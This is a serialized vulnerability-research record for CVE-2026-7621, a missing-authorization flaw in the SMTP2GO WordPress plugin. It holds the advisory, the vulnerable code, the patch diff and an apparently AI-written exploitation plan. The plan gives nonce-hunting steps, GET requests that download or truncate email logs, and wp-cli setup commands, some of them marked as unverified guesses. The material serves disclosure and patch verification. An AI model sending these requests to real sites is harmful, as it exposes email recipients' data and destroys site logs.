[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdQyHmiqjuNHrGxiPIBBlUuMU8D3Y_M_07UqCb2-qdMI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-7621","smtp2go-for-wordpress-missing-authorization-to-authenticated-subscriber-log-readtruncate","SMTP2GO for WordPress \u003C= 1.16.0 - Missing Authorization to Authenticated (Subscriber+) Log Read\u002FTruncate","The SMTP2GO for WordPress – Email Made Easy plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.16.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to truncate all SMTP2GO log records from the database or download a CSV export of all SMTP log data including recipient addresses, sender addresses, message subjects, and API response data.","smtp2go",null,"\u003C=1.16.0","1.17.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-27 17:42:00","2026-05-28 06:45:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6424de06-95ca-4148-9b24-0df0a2a8871d?source=api-prod",1,[22,23,24,25,26,27],"app\u002FSMTP2GOMailer.php","app\u002FSettingsHelper.php","app\u002FWordpressPluginAdmin.php","build\u002Fcomposer.json","build\u002Fvendor\u002Fautoload.php","build\u002Fvendor\u002Fcomposer\u002FInstalledVersions.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-7621 - SMTP2GO Log Unauthorized Access\n\n## 1. Vulnerability Summary\nThe **SMTP2GO for WordPress** plugin (up to 1.16.0) contains a missing authorization vulnerability in its log management features. Specifically, the functions `truncateLogs()` and `downloadLogs()` in the `SMTP2GO\\App\\WordpressPluginAdmin` class perform nonce verification but fail to check if the current user possesses the `manage_options` or similar administrative capability. This allows any authenticated user, including those with the **Subscriber** role, to trigger these actions if they can obtain a valid nonce.\n\n## 2. Attack Vector Analysis\n- **Endpoints**: \n    - `\u002Fwp-admin\u002Fadmin-post.php?action=truncate_smtp2go_logs`\n    - `\u002Fwp-admin\u002Fadmin-post.php?action=download_smtp2go_logs`\n- **Parameters**:\n    - `action`: The WordPress action hook (`truncate_smtp2go_logs` or `download_smtp2go_logs`).\n    - `_wpnonce`: A valid WordPress nonce for the respective action.\n- **Authentication**: Authenticated (Subscriber level or higher).\n- **Vulnerability Type**: Insecure Direct Object Reference (IDOR) \u002F Missing Role-Based Access Control (RBAC).\n\n## 3. Code Flow\n1. **Entry Point**: A request is made to `admin-post.php` with an `action` parameter.\n2. **Hook Registration**: The plugin registers these actions (likely via `add_action( 'admin_post_...', ... )`).\n3. **Execution**:\n    - For truncation: `SMTP2GO\\App\\WordpressPluginAdmin::truncateLogs()` is called.\n    - For download: `SMTP2GO\\App\\WordpressPluginAdmin::downloadLogs()` is called.\n4. **Vulnerable Sink (Download)**:\n   ```php\n   \u002F\u002F app\u002FWordpressPluginAdmin.php\n   public function downloadLogs() {\n       wp_verify_nonce($_GET['_wpnonce'], 'download_smtp2go_logs') or die('Invalid nonce');\n       global $wpdb;\n       $table = $wpdb->prefix . 'smtp2go_api_logs';\n       $logs  = $wpdb->get_results(\"SELECT * FROM $table ORDER BY created_at DESC\"); \u002F\u002F Sensitive data fetched\n       \u002F\u002F ... outputs CSV ...\n   }\n   ```\n5. **Vulnerable Sink (Truncate)**:\n   ```php\n   \u002F\u002F app\u002FWordpressPluginAdmin.php\n   public function truncateLogs() {\n       wp_verify_nonce($_GET['_wpnonce'], 'truncate_smtp2go_logs') or die('Invalid nonce');\n       global $wpdb;\n       $table = $wpdb->prefix . 'smtp2go_api_logs';\n       $wpdb->query(\"TRUNCATE TABLE $table\"); \u002F\u002F Database modified\n       \u002F\u002F ... redirects ...\n   }\n   ```\n6. **Missing Check**: Notice the absence of `if ( ! current_user_can( 'manage_options' ) ) wp_die();` in both methods.\n\n## 4. Nonce Acquisition Strategy\nNonces in this plugin are likely generated in the admin settings page. Even if a Subscriber cannot access the \"Settings\" page UI, the plugin might enqueue scripts or localize data on all admin pages (including the Subscriber's profile page).\n\n**Strategy:**\n1. Log in as a **Subscriber**.\n2. Navigate to `\u002Fwp-admin\u002Fprofile.php`.\n3. Search for the nonces in the page source or global JS objects.\n4. If not found, check if the plugin registers a menu page with weak capabilities (e.g., `read`). If so, navigate to that page.\n\n**JavaScript Variable Search:**\nUse `browser_eval` to look for nonces often passed via `wp_localize_script`. Common names for this plugin's JS objects might be `smtp2go_admin_vars` or `smtp2go_data`.\n```javascript\n\u002F\u002F Scan for potential localization objects\nObject.keys(window).filter(k => k.toLowerCase().includes('smtp2go'));\n```\n\n## 5. Exploitation Strategy\n### Step A: Download Sensitive Logs\n1. **Request**:\n   ```http\n   GET \u002Fwp-admin\u002Fadmin-post.php?action=download_smtp2go_logs&_wpnonce=[NONCE] HTTP\u002F1.1\n   Cookie: [Subscriber Cookies]\n   ```\n2. **Tool**: `http_request`\n3. **Expected Response**: `200 OK` with `Content-Type: text\u002Fcsv` and a filename like `smtp2go-logs-YYYY-MM-DD.csv`. The body should contain email recipient addresses and subjects.\n\n### Step B: Truncate All Logs\n1. **Request**:\n   ```http\n   GET \u002Fwp-admin\u002Fadmin-post.php?action=truncate_smtp2go_logs&_wpnonce=[NONCE] HTTP\u002F1.1\n   Cookie: [Subscriber Cookies]\n   ```\n2. **Tool**: `http_request`\n3. **Expected Response**: `302 Redirect` back to the logs page. The database table will now be empty.\n\n## 6. Test Data Setup\n1. **Send Test Emails**: Use `wp eval` to send several emails so that `smtp2go_api_logs` is populated.\n   ```bash\n   wp eval 'wp_mail(\"victim@example.com\", \"Sensitive Subject\", \"Sensitive Content\");'\n   ```\n2. **Verify Logs Exist**:\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_smtp2go_api_logs;\"\n   ```\n3. **Create Attacker**:\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n   ```\n\n## 7. Expected Results\n- **Information Disclosure**: The CSV download should contain records of emails sent by the site, including columns: `Site ID`, `To`, `From`, `Subject`, `Response`, and `Created At`.\n- **Integrity Loss**: The truncate action will successfully clear the `wp_smtp2go_api_logs` table.\n\n## 8. Verification Steps\n1. **Check CSV Content**: After the `downloadLogs` request, verify the downloaded file contains the strings \"Sensitive Subject\" and \"victim@example.com\".\n2. **Verify Truncation**: After the `truncateLogs` request, run:\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_smtp2go_api_logs;\"\n   ```\n   The result must be `0`.\n\n## 9. Alternative Approaches\nIf the nonces are strictly restricted to the `manage_options` capability at generation time (i.e., they are only rendered on the settings page and that page is hard-blocked), the exploit may fail. However, standard missing authorization vulnerabilities in WordPress often coincide with \"leaky\" nonces or a failure to check capabilities during the menu registration itself.\n\nAnother area to check is the `clearSavedApiKey` function (line 117), which *correctly* checks `current_user_can('manage_options')`, highlighting the developer's oversight in the log-related functions.","The SMTP2GO for WordPress plugin (up to version 1.16.0) lacks authorization checks in its log management functions. This allows authenticated users with Subscriber-level permissions or higher to truncate the plugin's API logs or download a CSV export containing sensitive email data such as recipient addresses, subjects, and API responses.","\u002F\u002F app\u002FWordpressPluginAdmin.php line 72\npublic function truncateLogs()\n{\n    wp_verify_nonce($_GET['_wpnonce'], 'truncate_smtp2go_logs') or die('Invalid nonce');\n    global $wpdb;\n    $table = $wpdb->prefix . 'smtp2go_api_logs';\n    $wpdb->query(\"TRUNCATE TABLE $table\");\n    $url = admin_url('admin.php?page=' . $this->plugin_name . '&tab=logs');\n    header('Location: ' . $url);\n    exit;\n}\n\n---\n\n\u002F\u002F app\u002FWordpressPluginAdmin.php line 84\npublic function downloadLogs()\n{\n    wp_verify_nonce($_GET['_wpnonce'], 'download_smtp2go_logs') or die('Invalid nonce');\n    global $wpdb;\n    $table = $wpdb->prefix . 'smtp2go_api_logs';\n    $logs  = $wpdb->get_results(\"SELECT * FROM $table ORDER BY created_at DESC\");\n    $filename = 'smtp2go-logs-' . date('Y-m-d') . '.csv';","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmtp2go\u002F1.15.0\u002Fapp\u002FWordpressPluginAdmin.php\t2026-05-04 00:35:40.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmtp2go\u002F1.17.0\u002Fapp\u002FWordpressPluginAdmin.php\t2026-05-24 23:37:38.000000000 +0000\n@@ -74,7 +73,13 @@\n \n     public function truncateLogs()\n     {\n-        wp_verify_nonce($_GET['_wpnonce'], 'truncate_smtp2go_logs') or die('Invalid nonce');\n+        if (\n+            !current_user_can('manage_options')\n+            || !isset($_GET['_wpnonce'])\n+            || !wp_verify_nonce($_GET['_wpnonce'], 'truncate_smtp2go_logs')\n+        ) {\n+            wp_die('Unauthorized', 403);\n+        }\n         global $wpdb;\n         $table = $wpdb->prefix . 'smtp2go_api_logs';\n         $wpdb->query(\"TRUNCATE TABLE $table\");\n@@ -85,7 +90,13 @@\n \n     public function downloadLogs()\n     {\n-        wp_verify_nonce($_GET['_wpnonce'], 'download_smtp2go_logs') or die('Invalid nonce');\n+        if (\n+            !current_user_can('manage_options')\n+            || !isset($_GET['_wpnonce'])\n+            || !wp_verify_nonce($_GET['_wpnonce'], 'download_smtp2go_logs')\n+        ) {\n+            wp_die('Unauthorized', 403);\n+        }\n         global $wpdb;\n         $table = $wpdb->prefix . 'smtp2go_api_logs';\n         $logs  = $wpdb->get_results(\"SELECT * FROM $table ORDER BY created_at DESC\");","The exploit targets the admin-post.php endpoint. An attacker requires a valid WordPress account with at least Subscriber-level privileges. By obtaining a valid nonce (which may be exposed via script localization on standard admin pages), the attacker sends a GET request to \u002Fwp-admin\u002Fadmin-post.php with the action parameter set to either 'download_smtp2go_logs' or 'truncate_smtp2go_logs' and the corresponding nonce. Because the plugin only verifies the nonce and not the user's capabilities, it executes the log retrieval or deletion as requested.","gemini-3-flash-preview","2026-06-04 17:03:24","2026-06-04 17:04:29",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","1.15.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmtp2go\u002Ftags\u002F1.15.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmtp2go.1.15.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmtp2go\u002Ftags\u002F1.17.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmtp2go.1.17.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmtp2go\u002Ftags"]